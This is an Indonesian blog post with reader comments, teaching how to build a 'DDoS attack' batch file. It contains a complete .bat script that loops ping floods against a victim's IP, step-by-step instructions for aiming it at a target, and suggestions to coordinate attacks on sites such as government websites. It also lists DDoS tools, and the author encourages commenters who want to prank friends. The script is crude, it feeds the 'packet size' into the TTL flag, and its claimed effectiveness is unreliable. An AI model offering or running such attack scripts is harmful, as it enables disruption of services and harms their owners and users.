Cara Membuat DDOS Attack Menggunakan CMD Dengan Notepad


DDos Attack ( Distributed Denial of Service (DDos) adalah salah satu jenis serangan Denial of Service yang menggunakan banyak host penyerang untuk menyerang satu buah host target dalam sebuah jaringan. Atau sebuah usaha untuk membuat suatu sumber daya komputer menjadi tidak bisa dipakai oleh user-nya, dengan menggunakan ribuan zombie system yang menyerang secara bersamaan. Tujuannya negatif, yakni agar sebuah website atau layanan online tidak bisa bekerja dengan efisien atau bahkan mati sama sekali, untuk sementara waktu atau selama-lamanya. DDoS attack adalah salah satu model dari DoS ( denial-of-service) attack.

Baca juga: Cara membuat virus sederhana menggunakan notepad

Ada berbagai cara untuk melakukan DDOS. bisa menggunakan software, atau bisa juga menggunakan script yang disimpan ke notepad dengan ekstensi file .bat. Kali ini saya akan memberikan cara membuat ddos attack menggunakan CMD Dengan Notepad

1. Copy paste script berikut ini ke notepad 


@echo off
mode 67,16
title DDOS Attacking Server
color 0c
cls
echo ==================================
echo =          Hacking Tools         =
echo ==================================
echo.
echo ++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server   +
echo + Author : Yusuf Naxgazura            +
echo + Visite : hacker-4rt.blogspot.com +
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo *    Masukan IP / Host Target    *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

2. Kemudian ganti save as type ke all files, dan simpan file dengan format .bat. contoh "ddos.bat"
3. Buka file ddos yang telah anda buat, kemudian masukan url target anda dan tekan enter
4. Setelah anda mendapatkan IP korban, langsung isi IP korban pada "IP Host" kemudian enter
5. Ganti jumlah byte sesuai keinginan anda misalnya 10000000 paket kemudian tekan enter.

Dengan cara itu anda bisa membuat suatu website down. Namun perlu diperhatikan, ini tidak akan berhasil jika anda hanya membuka 1 file, dan melakukan sendiri. Itulah alasannya para hacker yang mentargetkan suatu website besar seperti website pemerintahan, banyak mengajak orang untuk membantu melakukan ddos ini. Itu lah cara sederhana dan mudah membuat ddos dengan script yang disimpan lewat notepad.

Selain lewat notepad, anda juga bisa melakukan ddos menggunakan software. Banyak software yang bisa anda gunakan untuk melakukan ddos ini. Tentunya dengan menggunakan software akan lebih diuntungkan daripada menggunakan notepad. Contoh software hacker untuk melakukan ddos yaitu LOIC,HOIC,HULK,UDP FLOODER,TOR's Hammer,DDOSIM, dan lain lain


Cara Membuat DDOS Attack Menggunakan CMD Dengan Notepad Cara Membuat DDOS Attack Menggunakan CMD Dengan Notepad Reviewed by Naufal Umar on 13:46 Rating: 5

19 comments:

  1. weh tapi ampuh gak gan ,buat ngedown servernya

    ReplyDelete
    Replies
    1. Ampuh tapi harus ddos attack rame rame

      Delete
  2. izin nyicip gann..
    mau coba isengin orang..
    makasih gan

    ReplyDelete
    Replies
    1. Silahkan gan. Silahkan membuat ddos attack dengan notepad

      Delete
  3. kalau mau DDOS google perlu berapa milyar orang yak :3

    ReplyDelete
    Replies
    1. Haha angkat tangan deh gan ddos google

      Delete
  4. Wah keren scriptnya, tp butuh banyak orang jg klo mau benar2 down :D

    ReplyDelete
  5. Wah! Cuman q nda tau efeknya ke website yang di serang apa ya? Bisa dijelaskan?

    ReplyDelete
    Replies
    1. DDOS attack akan menyebabkan suatu website atau server menjadi down sehingga tidak bisa diakses

      Delete
    2. sotoy banget bapak umar -TEVINRIZZAREGENPEHA

      Delete
  6. Kalau bukanya lebih dari 1 cmd gimana min?

    ReplyDelete
  7. Replies
    1. Semakin banyak yang ddos semakin bagus gan

      Delete
  8. mantap gan, tapi kalau cuman dikit orangnya sama aja

    ReplyDelete
    Replies
    1. Iya sist ddos attack usahakan ramai ramai biar cepet down

      Delete
  9. itu ampuh gak gan , ane pengen nyoba jaili temen

    ReplyDelete

Powered by Blogger.